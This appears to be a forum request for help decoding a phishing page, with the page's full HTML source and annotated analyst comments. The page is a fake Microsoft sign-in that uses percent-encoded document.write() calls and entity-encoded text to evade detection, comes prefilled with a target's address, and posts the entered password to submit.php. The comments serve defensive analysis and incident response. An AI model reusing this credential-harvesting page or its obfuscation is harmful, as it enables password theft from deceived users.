
malicious encoded javascript in website source code

Hi,

Can you decode these lines of code, seen in a recent phishing campaign hitting us?

Partially base64 encoded javascript, variables for something called spoguestaccess which makes me nervous and so on.

What does it do? Does it download a payload? It is currently not detected by Intercept-X.

PS: also have a case open for this

sourcecode1.txt


<!DOCTYPE html>
<html>
<head>
	<!-- Analyst note: the numeric character references in the title decode to
	     "Sign in to your account". The visible text is entity-encoded, so the plain
	     string does not appear in the raw source; match on the decoded form when
	     writing content rules for this page. -->
	<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<!-- The next three tags ask crawlers not to index or follow the page. Two of them
	     have no "=" after content, so a parser may not read the value at all.
	     NOTE(review): presumably meant to keep the page out of search indexes; confirm. -->
	<meta name="robots" content "none">
	<meta name="Googlebot" content="nofollow">
	<meta name="robots" content "noindex, nofollow">
	<!-- Every resource is loaded by relative path from the hosting site. The contents of
	     style.css and js/jquery.js are not part of this listing, so whether js/jquery.js
	     is an unmodified jQuery build cannot be judged from here; retrieve and hash it
	     separately before concluding that the page runs no further script. -->
	<link rel="shortcut icon" type="icon" href="images/favicon.png">
	<link rel="stylesheet" type="text/css" href="style.css">
	<script type="text/javascript" src="js/jquery.js"></script>	
	
</head>

<body>
<!-- Analyst note: the argument of unescape() is percent-encoded (URL-encoded) text. It is
     not base64 and not encrypted; any URL decoder reverses it. document.write() inserts the
     decoded markup at this position: the opening tags <div class="overlay"> and
     <div class="login-box">, then <img src="images/ms-logo-v2.jpg" alt="logo">, then the
     opening tag <div id="identity" class="identity-banner">. The decoded text contains no
     script element and no URL other than the relative image path. -->
<script type="text/javascript">
<!--
document.write(unescape('%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%0A%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%6F%67%69%6E%2D%62%6F%78%22%3E%0A%09%09%09%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%6D%73%2D%6C%6F%67%6F%2D%76%32%2E%6A%70%67%22%20%61%6C%74%3D%22%6C%6F%67%6F%22%3E%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%65%6E%74%69%74%79%22%20%63%6C%61%73%73%3D%22%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%22%3E'));
//-->
</script>
			
				<!-- Analyst note: static, unencoded markup. The address displayed here is the same
				     value carried by the hidden "email" input of the form further down, so the page
				     is delivered already filled in for one recipient and asks only for a password.
				     NOTE(review): presumably the address is inserted per recipient by the sender;
				     confirm against the link in the original message. -->
				<div id="identity-name" class="identity">
					&nbsp;&nbsp;&nbsp;<img src="images/arrow.png" alt="arrow">&nbsp;&nbsp;&nbsp;&nbsp;golllel@byom.de				</div>
				
				
			</div>

			<!-- The heading's character references decode to "Enter password". -->
			<h2 id="title" style="color:#231E17;"><strong>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</strong></h2>
			<p id="message" class="message"></p>

<!-- Analyst note: percent-encoded markup again. It decodes to
     <div id="loader" class="loader hidden"> holding five empty <div class="circle"></div>
     children, followed by the closing </div>. Nothing else is in the string.
     NOTE(review): presumably a loading animation styled by style.css, which is not shown. -->
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%61%64%65%72%22%20%63%6C%61%73%73%3D%22%6C%6F%61%64%65%72%20%68%69%64%64%65%6E%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E'));
//-->
</script>

			<!-- Analyst note: this form is the only data flow visible in the listing. It sends an
			     HTTP POST to the relative URL submit.php on the hosting site, carrying the hidden
			     "email" value plus the "password" and "signin" fields that the decoded markup
			     below adds. Nothing in the listing downloads or executes a file; the page collects
			     a password. For response: search proxy or web gateway logs for POST requests to
			     submit.php on the host that served this page, and treat any password entered
			     there as compromised. -->
			<form action="submit.php" method="post">
				<input type="hidden" id="email" name="email" value="golllel@byom.de">
<!-- The percent-encoded string below decodes to, in order:
     <input id="password" type="password" name="password" placeholder="Password" required autofocus>,
     a link with href="#" whose text reads "Forgot my password",
     <input id="signin" type="submit" name="signin" value="Sign in">,
     the closing </form> and two closing </div> tags, and an opening <footer> with a list
     whose items read "Privacy & cookies" and "Terms of use" (both href="#") and
     "©2020 Microsoft" (no href). The link texts are written as character references
     inside the percent-encoding, so they are encoded twice.
     NOTE(review): as pasted, the string literal continues onto a second line, which is a
     JavaScript syntax error; presumably a line-wrap artifact of the attachment, confirm
     against the original file. -->
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%72%65%71%75%69%72%65%64%20%61%75%74%6F%66%6F%63%75%73%3E%0A%09%09%09%09%0A%09%09%09%3C%62%72%3E%0A%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%67%72%6F%75%70%32%22%3E%0A%09%09%09%09%0A%09%09%09%09%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%66%61%64%65%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%73%69%67%6E%69%6E%22%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%73%69%67%6E%69%6E%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%0A%09%09%09%3C%2F%66%6F%72%6D%3E%0A%09%09%3C%2F%64%69%76%3E%0A%09%3C%2F%64%69%76%3E%0A%0A%09%3C%66%6F%6F%74%65%72%3E%0A%09%09%3C%75%6C%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%30%3B%26%23%78%37%32%3B%26%23%78%36%39%3B%26%23%78%37%36%3B%26%23%78%36%31%3B%26%23%78%36%33%3B%26%23%78%37%39%3B%20%26%20%26%23%78%36%33%3B%26%23%78%36%46%3B%26%23%78%36%46%3B%26%23%78%36%42%3B%26%23%78%36%39%3B%26%23%78%36%35%3B%26%23%78%37%33%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%34%3B%26%23%78%36%35%3B%26%23%78%37%32%3B%26%23%78%36%44%3B%26%23%78%37%33%3B%26%23%78%32%30%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%32%30%3B%26%23%78%37%35%3B%26%23%78%
37%33%3B%26%23%78%36%35%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%3E%26%63%6F%70%79%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%32%30%3B%26%23%78%34%44%3B%26%23%78%36%39%3B%26%23%78%36%33%3B%26%23%78%37%32%3B%26%23%78%36%46%3B%26%23%78%37%33%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%37%34%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%3C%2F%75%6C%3E'));
//-->
</script>
	<!-- Closes the <footer> element that the document.write() call above opened. -->
	</footer>

</body>
</html>

Regards


